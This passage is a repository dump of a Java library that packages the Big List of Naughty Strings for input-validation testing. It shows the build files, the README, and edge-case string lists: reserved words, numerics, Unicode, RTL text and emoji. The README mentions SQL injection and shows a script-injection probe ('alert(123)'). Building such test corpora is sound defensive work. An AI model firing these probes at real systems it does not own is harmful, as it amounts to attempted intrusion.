├── .gitattributes ├── .gitignore ├── CHANGELOG.md ├── LICENSE ├── README.md ├── build.gradle ├── gradle └── wrapper │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── settings.gradle └── src ├── main └── java │ └── io │ └── github │ └── nowshad │ ├── BLNS.java │ ├── BLNSInternal.java │ └── NaughtyStrings.java └── test └── java └── io └── github └── nowshad ├── BLNSInternalTest.java ├── BLNSTest.java └── NaughtyStringsTest.java /.gitattributes: -------------------------------------------------------------------------------- 1 | # 2 | # https://help.github.com/articles/dealing-with-line-endings/ 3 | # 4 | # Linux start script should use lf 5 | /gradlew text eol=lf 6 | 7 | # These are Windows script files and should use crlf 8 | *.bat text eol=crlf 9 | 10 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled class file 2 | *.class 3 | 4 | # Log file 5 | *.log 6 | 7 | # BlueJ files 8 | *.ctxt 9 | 10 | # Mobile Tools for Java (J2ME) 11 | .mtj.tmp/ 12 | 13 | # Package Files # 14 | *.jar 15 | *.war 16 | *.nar 17 | *.ear 18 | *.zip 19 | *.tar.gz 20 | *.rar 21 | 22 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml 23 | hs_err_pid* 24 | 25 | .idea 26 | naughty-strings-java.iml 27 | 28 | # Ignore Gradle project-specific cache directory 29 | .gradle 30 | 31 | # Ignore Gradle build output directory 32 | build 33 | 34 | # Ignore the credentials container file 35 | gradle.properties 36 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## [1.0.1] - 2022-10-22 2 | ### Changed 3 | 4 | - Refactor codebase under a package name 5 | 6 | ## [1.0.0] - 2022-10-15 7 | ### Added 8 | - Add NaughtyStrings data into a single file 9 | - Add enum for all types of strings 10 | - Add public method to access data 11 | - Add MIT LICENSE -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Nowshad Hasan 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Naughty-Strings Java 2 | Java API for the [Big List of Naughty Strings](https://github.com/minimaxir/big-list-of-naughty-strings). 3 | 4 | [CHANGELOG](https://github.com/nowshad-hasan/naughty-strings-java/blob/main/CHANGELOG.md) is here. 5 | ## Description 6 | Sometimes we need to test our user input with different types of strings. It might be character, icon, emoji, SQL injection etc. This library is built to validate the user input with those **_totally uncertain_** strings. We call it **Naughty Strings**. 7 | Some example below:
8 | Ω≈ç√∫˜µ≤≥÷
9 | åß∂ƒ©˙∆˚¬…æ
10 | œ∑´®†¥¨ˆøπ“‘
11 | ¡™£¢∞§¶•ªº–≠
12 | ¸˛Ç◊ı˜Â¯˘¿
13 | 👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂
14 | ;alert(123);
15 | 社會科學院語學研究所
16 | (。◕ ∀ ◕。)
17 | 18 | ## Installation 19 | Gradle:
20 | ``` 21 | implementation 'io.github.nowshad-hasan:naughty-strings-java:1.0.1' 22 | ``` 23 | Maven:
24 | ```` 25 | 26 | io.github.nowshad-hasan 27 | naughty-strings-java 28 | 1.0.1 29 | 30 | ```` 31 | Please go to [Maven Repository](https://mvnrepository.com/artifact/io.github.nowshad-hasan/naughty-strings-java) for other dependencies. 32 | ## Usage 33 | We can use it in two ways. 34 | 35 | 1. Get all the strings of a type 36 | ````java 37 | List naughtyStringList = BLNS.getList(NaughtyStrings.RESERVED_STRINGS); 38 | ```` 39 | 40 | If we want all the naughty strings, then we must pass the enum `NaughtyStrings.ALL`. 41 | 42 | 2. Get custom size, random strings of a type 43 | 44 | ````java 45 | List randomNaughtyStringList = BLNS.getRandomList(10, NaughtyStrings.NUMERIC_STRINGS); 46 | ```` 47 | We have to pass `NaughtyStrings.ALL` to get the random custom size list from all the naughty strings. 48 | 49 | ## Contribution 50 | 51 | Please feel free to contribute in this project, by solving any critical issue, typo, 52 | code-structure improvement etc. 53 | Open an issue [here](https://github.com/nowshad-hasan/naughty-strings-java/issues/new) with description, screenshot and anything you need. 54 | 55 | Pull Requests are most welcome. Read the guide from [opensource.com](https://opensource.com/article/19/7/create-pull-request-github) 56 | or [GitHub docs](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/creating-a-pull-request) 57 | and make a PR with your desired code. We will definitely look into it. 58 | 59 | 60 | -------------------------------------------------------------------------------- /build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'java' 3 | id 'maven-publish' 4 | id 'signing' 5 | } 6 | group 'io.github.nowshad-hasan' 7 | version '1.0.1' 8 | 9 | repositories { 10 | mavenCentral() 11 | maven { url "https://oss.sonatype.org/content/repositories/snapshots/" } 12 | } 13 | 14 | java { 15 | withJavadocJar() 16 | withSourcesJar() 17 | } 18 | 19 | publishing { 20 | publications { 21 | 22 | mavenJava(MavenPublication) { 23 | 24 | groupId = 'io.github.nowshad-hasan' 25 | artifactId = 'naughty-strings-java' 26 | version = '1.0.1' 27 | from components.java 28 | 29 | pom { 30 | name = 'Naughty Strings Java' 31 | description = 'Naughty Strings Java is an API for testing different types of user input for strings.' + 32 | ' It contains emoji, icon, sql injection and others type of data.' 33 | url = 'https://github.com/nowshad-hasan/naughty-strings-java' 34 | inceptionYear = '2022' 35 | 36 | licenses { 37 | license { 38 | name = 'MIT License' 39 | url = 'https://opensource.org/licenses/MIT' 40 | } 41 | } 42 | developers { 43 | developer { 44 | id = 'nowshad-hasan' 45 | name = 'Nowshad Hasan' 46 | email = 'nowshadapu@gmail.com' 47 | } 48 | } 49 | scm { 50 | connection = 'scm:git:git:github.com/nowshad-hasan/naughty-strings-java.git' 51 | developerConnection = 'scm:git:ssh://github.com/nowshad-hasan/naughty-strings-java.git' 52 | url = 'https://github.com/nowshad-hasan/naughty-strings-java' 53 | } 54 | } 55 | } 56 | } 57 | 58 | repositories { 59 | maven { 60 | name = "OSSRH" 61 | url = "https://s01.oss.sonatype.org/service/local/staging/deploy/maven2/" 62 | credentials { 63 | username = project.properties["username"] 64 | password = project.properties["password"] 65 | } 66 | } 67 | } 68 | } 69 | 70 | signing { 71 | sign publishing.publications.mavenJava 72 | } 73 | 74 | javadoc { 75 | if (JavaVersion.current().isJava9Compatible()) { 76 | options.addBooleanOption('html5', true) 77 | } 78 | } 79 | 80 | dependencies { 81 | testImplementation 'org.junit.jupiter:junit-jupiter-api:5.7.0' 82 | testRuntimeOnly 'org.junit.jupiter:junit-jupiter-engine:5.7.0' 83 | } 84 | 85 | test { 86 | useJUnitPlatform() 87 | } -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-7.5-bin.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists -------------------------------------------------------------------------------- /gradlew: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # Copyright © 2015-2021 the original authors. 5 | # 6 | # Licensed under the Apache License, Version 2.0 (the "License"); 7 | # you may not use this file except in compliance with the License. 8 | # You may obtain a copy of the License at 9 | # 10 | # https://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, software 13 | # distributed under the License is distributed on an "AS IS" BASIS, 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | # See the License for the specific language governing permissions and 16 | # limitations under the License. 17 | # 18 | 19 | ############################################################################## 20 | # 21 | # Gradle start up script for POSIX generated by Gradle. 22 | # 23 | # Important for running: 24 | # 25 | # (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is 26 | # noncompliant, but you have some other compliant shell such as ksh or 27 | # bash, then to run this script, type that shell name before the whole 28 | # command line, like: 29 | # 30 | # ksh Gradle 31 | # 32 | # Busybox and similar reduced shells will NOT work, because this script 33 | # requires all of these POSIX shell features: 34 | # * functions; 35 | # * expansions «$var», «${var}», «${var:-default}», «${var+SET}», 36 | # «${var#prefix}», «${var%suffix}», and «$( cmd )»; 37 | # * compound commands having a testable exit status, especially «case»; 38 | # * various built-in commands including «command», «set», and «ulimit». 39 | # 40 | # Important for patching: 41 | # 42 | # (2) This script targets any POSIX shell, so it avoids extensions provided 43 | # by Bash, Ksh, etc; in particular arrays are avoided. 44 | # 45 | # The "traditional" practice of packing multiple parameters into a 46 | # space-separated string is a well documented source of bugs and security 47 | # problems, so this is (mostly) avoided, by progressively accumulating 48 | # options in "$@", and eventually passing that to Java. 49 | # 50 | # Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, 51 | # and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; 52 | # see the in-line comments for details. 53 | # 54 | # There are tweaks for specific operating systems such as AIX, CygWin, 55 | # Darwin, MinGW, and NonStop. 56 | # 57 | # (3) This script is generated from the Groovy template 58 | # https://github.com/gradle/gradle/blob/master/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt 59 | # within the Gradle project. 60 | # 61 | # You can find Gradle at https://github.com/gradle/gradle/. 62 | # 63 | ############################################################################## 64 | 65 | # Attempt to set APP_HOME 66 | 67 | # Resolve links: $0 may be a link 68 | app_path=$0 69 | 70 | # Need this for daisy-chained symlinks. 71 | while 72 | APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path 73 | [ -h "$app_path" ] 74 | do 75 | ls=$( ls -ld "$app_path" ) 76 | link=${ls#*' -> '} 77 | case $link in #( 78 | /*) app_path=$link ;; #( 79 | *) app_path=$APP_HOME$link ;; 80 | esac 81 | done 82 | 83 | APP_HOME=$( cd "${APP_HOME:-./}" && pwd -P ) || exit 84 | 85 | APP_NAME="Gradle" 86 | APP_BASE_NAME=${0##*/} 87 | 88 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 89 | DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' 90 | 91 | # Use the maximum available, or set MAX_FD != -1 to use that value. 92 | MAX_FD=maximum 93 | 94 | warn () { 95 | echo "$*" 96 | } >&2 97 | 98 | die () { 99 | echo 100 | echo "$*" 101 | echo 102 | exit 1 103 | } >&2 104 | 105 | # OS specific support (must be 'true' or 'false'). 106 | cygwin=false 107 | msys=false 108 | darwin=false 109 | nonstop=false 110 | case "$( uname )" in #( 111 | CYGWIN* ) cygwin=true ;; #( 112 | Darwin* ) darwin=true ;; #( 113 | MSYS* | MINGW* ) msys=true ;; #( 114 | NONSTOP* ) nonstop=true ;; 115 | esac 116 | 117 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 118 | 119 | 120 | # Determine the Java command to use to start the JVM. 121 | if [ -n "$JAVA_HOME" ] ; then 122 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 123 | # IBM's JDK on AIX uses strange locations for the executables 124 | JAVACMD=$JAVA_HOME/jre/sh/java 125 | else 126 | JAVACMD=$JAVA_HOME/bin/java 127 | fi 128 | if [ ! -x "$JAVACMD" ] ; then 129 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 130 | 131 | Please set the JAVA_HOME variable in your environment to match the 132 | location of your Java installation." 133 | fi 134 | else 135 | JAVACMD=java 136 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 137 | 138 | Please set the JAVA_HOME variable in your environment to match the 139 | location of your Java installation." 140 | fi 141 | 142 | # Increase the maximum file descriptors if we can. 143 | if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then 144 | case $MAX_FD in #( 145 | max*) 146 | MAX_FD=$( ulimit -H -n ) || 147 | warn "Could not query maximum file descriptor limit" 148 | esac 149 | case $MAX_FD in #( 150 | '' | soft) :;; #( 151 | *) 152 | ulimit -n "$MAX_FD" || 153 | warn "Could not set maximum file descriptor limit to $MAX_FD" 154 | esac 155 | fi 156 | 157 | # Collect all arguments for the java command, stacking in reverse order: 158 | # * args from the command line 159 | # * the main class name 160 | # * -classpath 161 | # * -D...appname settings 162 | # * --module-path (only if needed) 163 | # * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 164 | 165 | # For Cygwin or MSYS, switch paths to Windows format before running java 166 | if "$cygwin" || "$msys" ; then 167 | APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) 168 | CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) 169 | 170 | JAVACMD=$( cygpath --unix "$JAVACMD" ) 171 | 172 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 173 | for arg do 174 | if 175 | case $arg in #( 176 | -*) false ;; # don't mess with options #( 177 | /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath 178 | [ -e "$t" ] ;; #( 179 | *) false ;; 180 | esac 181 | then 182 | arg=$( cygpath --path --ignore --mixed "$arg" ) 183 | fi 184 | # Roll the args list around exactly as many times as the number of 185 | # args, so each arg winds up back in the position where it started, but 186 | # possibly modified. 187 | # 188 | # NB: a `for` loop captures its iteration list before it begins, so 189 | # changing the positional parameters here affects neither the number of 190 | # iterations, nor the values presented in `arg`. 191 | shift # remove old arg 192 | set -- "$@" "$arg" # push replacement arg 193 | done 194 | fi 195 | 196 | # Collect all arguments for the java command; 197 | # * $DEFAULT_JVM_OPTS, $JAVA_OPTS, and $GRADLE_OPTS can contain fragments of 198 | # shell script including quotes and variable substitutions, so put them in 199 | # double quotes to make sure that they get re-expanded; and 200 | # * put everything else in single quotes, so that it's not re-expanded. 201 | 202 | set -- \ 203 | "-Dorg.gradle.appname=$APP_BASE_NAME" \ 204 | -classpath "$CLASSPATH" \ 205 | org.gradle.wrapper.GradleWrapperMain \ 206 | "$@" 207 | 208 | # Stop when "xargs" is not available. 209 | if ! command -v xargs >/dev/null 2>&1 210 | then 211 | die "xargs is not available" 212 | fi 213 | 214 | # Use "xargs" to parse quoted args. 215 | # 216 | # With -n1 it outputs one arg per line, with the quotes and backslashes removed. 217 | # 218 | # In Bash we could simply go: 219 | # 220 | # readarray ARGS < <( xargs -n1 <<<"$var" ) && 221 | # set -- "${ARGS[@]}" "$@" 222 | # 223 | # but POSIX shell has neither arrays nor command substitution, so instead we 224 | # post-process each arg (as a line of input to sed) to backslash-escape any 225 | # character that might be a shell metacharacter, then use eval to reverse 226 | # that process (while maintaining the separation between arguments), and wrap 227 | # the whole thing up as a single "set" statement. 228 | # 229 | # This will of course break if any of these variables contains a newline or 230 | # an unmatched quote. 231 | # 232 | 233 | eval "set -- $( 234 | printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | 235 | xargs -n1 | 236 | sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | 237 | tr '\n' ' ' 238 | )" '"$@"' 239 | 240 | exec "$JAVACMD" "$@" 241 | -------------------------------------------------------------------------------- /gradlew.bat: -------------------------------------------------------------------------------- 1 | @rem 2 | @rem Copyright 2015 the original author or authors. 3 | @rem 4 | @rem Licensed under the Apache License, Version 2.0 (the "License"); 5 | @rem you may not use this file except in compliance with the License. 6 | @rem You may obtain a copy of the License at 7 | @rem 8 | @rem https://www.apache.org/licenses/LICENSE-2.0 9 | @rem 10 | @rem Unless required by applicable law or agreed to in writing, software 11 | @rem distributed under the License is distributed on an "AS IS" BASIS, 12 | @rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | @rem See the License for the specific language governing permissions and 14 | @rem limitations under the License. 15 | @rem 16 | 17 | @if "%DEBUG%"=="" @echo off 18 | @rem ########################################################################## 19 | @rem 20 | @rem Gradle startup script for Windows 21 | @rem 22 | @rem ########################################################################## 23 | 24 | @rem Set local scope for the variables with windows NT shell 25 | if "%OS%"=="Windows_NT" setlocal 26 | 27 | set DIRNAME=%~dp0 28 | if "%DIRNAME%"=="" set DIRNAME=. 29 | set APP_BASE_NAME=%~n0 30 | set APP_HOME=%DIRNAME% 31 | 32 | @rem Resolve any "." and ".." in APP_HOME to make it shorter. 33 | for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi 34 | 35 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 36 | set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" 37 | 38 | @rem Find java.exe 39 | if defined JAVA_HOME goto findJavaFromJavaHome 40 | 41 | set JAVA_EXE=java.exe 42 | %JAVA_EXE% -version >NUL 2>&1 43 | if %ERRORLEVEL% equ 0 goto execute 44 | 45 | echo. 46 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 47 | echo. 48 | echo Please set the JAVA_HOME variable in your environment to match the 49 | echo location of your Java installation. 50 | 51 | goto fail 52 | 53 | :findJavaFromJavaHome 54 | set JAVA_HOME=%JAVA_HOME:"=% 55 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 56 | 57 | if exist "%JAVA_EXE%" goto execute 58 | 59 | echo. 60 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 61 | echo. 62 | echo Please set the JAVA_HOME variable in your environment to match the 63 | echo location of your Java installation. 64 | 65 | goto fail 66 | 67 | :execute 68 | @rem Setup the command line 69 | 70 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 71 | 72 | 73 | @rem Execute Gradle 74 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* 75 | 76 | :end 77 | @rem End local scope for the variables with windows NT shell 78 | if %ERRORLEVEL% equ 0 goto mainEnd 79 | 80 | :fail 81 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 82 | rem the _cmd.exe /c_ return code! 83 | set EXIT_CODE=%ERRORLEVEL% 84 | if %EXIT_CODE% equ 0 set EXIT_CODE=1 85 | if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% 86 | exit /b %EXIT_CODE% 87 | 88 | :mainEnd 89 | if "%OS%"=="Windows_NT" endlocal 90 | 91 | :omega 92 | -------------------------------------------------------------------------------- /settings.gradle: -------------------------------------------------------------------------------- 1 | rootProject.name = 'naughty-strings-java' -------------------------------------------------------------------------------- /src/main/java/io/github/nowshad/BLNS.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import java.util.List; 4 | 5 | 6 | /** 7 | * @author Nowshad Hasan 8 | * @since 12/7/22 11:07 pm 9 | */ 10 | public class BLNS { 11 | 12 | public static List getRandomList(int size, NaughtyStrings type) { 13 | return BLNSInternal.getRandomStrings(size, type); 14 | } 15 | 16 | public static List getList(NaughtyStrings type) { 17 | return BLNSInternal.getStrings(type); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/main/java/io/github/nowshad/BLNSInternal.java: -------------------------------------------------------------------------------- 1 | package io.github.nowshad; 2 | 3 | import java.util.ArrayList; 4 | import java.util.Arrays; 5 | import java.util.List; 6 | import java.util.Random; 7 | import java.util.stream.Collectors; 8 | 9 | class BLNSInternal { 10 | static final List RESERVED_STRINGS = Arrays.asList( 11 | "", 12 | "undefined", 13 | "undef", 14 | "null", 15 | "NULL", 16 | "(null)", 17 | "nil", 18 | "NIL", 19 | "true", 20 | "false", 21 | "True", 22 | "False", 23 | "TRUE", 24 | "FALSE", 25 | "None", 26 | "hasOwnProperty", 27 | "then", 28 | "\\", 29 | "\\\\" 30 | ); 31 | static List NUMERIC_STRINGS = Arrays.asList( 32 | "0", 33 | "1", 34 | "1.00", 35 | "$1.00", 36 | "1/2", 37 | "1E2", 38 | "1E02", 39 | "1E+02", 40 | "-1", 41 | "-1.00", 42 | "-$1.00", 43 | "-1/2", 44 | "-1E2", 45 | "-1E02", 46 | "-1E+02", 47 | "1/0", 48 | "0/0", 49 | "-2147483648/-1", 50 | "-9223372036854775808/-1", 51 | "-0", 52 | "-0.0", 53 | "+0", 54 | "+0.0", 55 | "0.00", 56 | "0..0", 57 | ".", 58 | "0.0.0", 59 | "0,00", 60 | "0,,0", 61 | ",", 62 | "0,0,0", 63 | "0.0/0", 64 | "1.0/0.0", 65 | "0.0/0.0", 66 | "1,0/0,0", 67 | "0,0/0,0", 68 | "--1", 69 | "-", 70 | "-.", 71 | "-,", 72 | "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", 73 | "NaN", 74 | "Infinity", 75 | "-Infinity", 76 | "INF", 77 | "1#INF", 78 | "-1#IND", 79 | "1#QNAN", 80 | "1#SNAN", 81 | "1#IND", 82 | "0x0", 83 | "0xffffffff", 84 | "0xffffffffffffffff", 85 | "0xabad1dea", 86 | "123456789012345678901234567890123456789", 87 | "1,000.00", 88 | "1 000.00", 89 | "1'000.00", 90 | "1,000,000.00", 91 | "1 000 000.00", 92 | "1'000'000.00", 93 | "1.000,00", 94 | "1 000,00", 95 | "1'000,00", 96 | "1.000.000,00", 97 | "1 000 000,00", 98 | "1'000'000,00", 99 | "01000", 100 | "08", 101 | "09", 102 | "2.2250738585072011e-308" 103 | ); 104 | static List SPECIAL_CHARACTERS = Arrays.asList( 105 | ",./;'[]\\-=", 106 | "<>?:\"{}|_+", 107 | "!@#$%^&*()`~", 108 | "\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f", 109 | "€", 110 | "\t\u000b\f  ", 111 | "𑂽𛲠𛲡𛲢𛲣𝅳𝅴𝅵𝅶𝅷𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶󠁷󠁸󠁹󠁺󠁻󠁼󠁽󠁾󠁿", 112 | "", 113 | "￾" 114 | ); 115 | static List UNICODE_SYMBOLS = Arrays.asList( 116 | "Ω≈ç√∫˜µ≤≥÷", 117 | "åß∂ƒ©˙∆˚¬…æ", 118 | "œ∑´®†¥¨ˆøπ“‘", 119 | "¡™£¢∞§¶•ªº–≠", 120 | "¸˛Ç◊ı˜Â¯˘¿", 121 | "ÅÍÎÏ˝ÓÔÒÚÆ☃", 122 | "Œ„´‰ˇÁ¨ˆØ∏”’", 123 | "`⁄€‹›fifl‡°·‚—±", 124 | "⅛⅜⅝⅞", 125 | "ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя", 126 | "٠١٢٣٤٥٦٧٨٩" 127 | ); 128 | static List UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS = Arrays.asList( 129 | "⁰⁴⁵", 130 | "₀₁₂", 131 | "⁰⁴⁵₀₁₂", 132 | "ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็" 133 | ); 134 | static List QUOTATION_MARKS = Arrays.asList( 135 | "'", 136 | "\"", 137 | "''", 138 | "\"\"", 139 | "'\"'", 140 | "\"''''\"'\"", 141 | "\"'\"'\"''''\"", 142 | "", 143 | "", 144 | "", 145 | "" 146 | ); 147 | static List TWO_BYTE_CHARACTERS = Arrays.asList( 148 | "田中さんにあげて下さい", 149 | "パーティーへ行かないか", 150 | "和製漢語", 151 | "部落格", 152 | "사회과학원 어학연구소", 153 | "찦차를 타고 온 펲시맨과 쑛다리 똠방각하", 154 | "社會科學院語學研究所", 155 | "울란바토르", 156 | "𠜎𠜱𠝹𠱓𠱸𠲖𠳏" 157 | ); 158 | static List TWO_BYTE_LETTER = Arrays.asList( 159 | "𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆" 160 | ); 161 | static List SPECIAL_UNICODE_CHARACTERS_UNION = Arrays.asList( 162 | "表", 163 | "ポ", 164 | "あ", 165 | "A", 166 | "鷗", 167 | "Œ", 168 | "é", 169 | "B", 170 | "逍", 171 | "Ü", 172 | "ß", 173 | "ª", 174 | "ą", 175 | "ñ", 176 | "丂", 177 | "㐀", 178 | "𠀀" 179 | ); 180 | static List CHANGING_LENGTH_WHEN_LOWERCASE = Arrays.asList( 181 | "Ⱥ", 182 | "Ⱦ" 183 | ); 184 | static List JAPANESE_EMOTICONS = Arrays.asList( 185 | "ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ", 186 | "(。◕ ∀ ◕。)", 187 | "`ィ(´∀`∩", 188 | "__ロ(,_,*)", 189 | "・( ̄∀ ̄)・:*:", 190 | "゚・✿ヾ╲(。◕‿◕。)╱✿・゚", 191 | ",。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’", 192 | "(╯°□°)╯︵ ┻━┻)", 193 | "(ノಥ益ಥ) ┻━┻", 194 | "┬─┬ノ( º _ ºノ)", 195 | "( ͡° ͜ʖ ͡°)", 196 | "¯\\_(ツ)_/¯" 197 | ); 198 | static List EMOJI = Arrays.asList( 199 | "😍", 200 | "👩🏽", 201 | "👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️", 202 | "👾 🙇 💁 🙅 🙆 🙋 🙎 🙍", 203 | "🐵 🙈 🙉 🙊", 204 | "❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙", 205 | "✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿", 206 | "👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦", 207 | "🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧", 208 | "0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟" 209 | ); 210 | static List REGIONAL_INDICATOR_SYMBOLS = Arrays.asList( 211 | "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸", 212 | "🇺🇸🇷🇺🇸🇦🇫🇦🇲", 213 | "🇺🇸🇷🇺🇸🇦" 214 | ); 215 | static List UNICODE_NUMBERS = Arrays.asList( 216 | "123", 217 | "١٢٣" 218 | ); 219 | static List RIGHT_TO_LEFT_STRINGS = Arrays.asList( 220 | "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.", 221 | "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ", 222 | "הָיְתָהtestالصفحات التّحول", 223 | "﷽", 224 | "ﷺ", 225 | "مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، " 226 | ); 227 | static List OGHAM_TEXT = Arrays.asList( 228 | 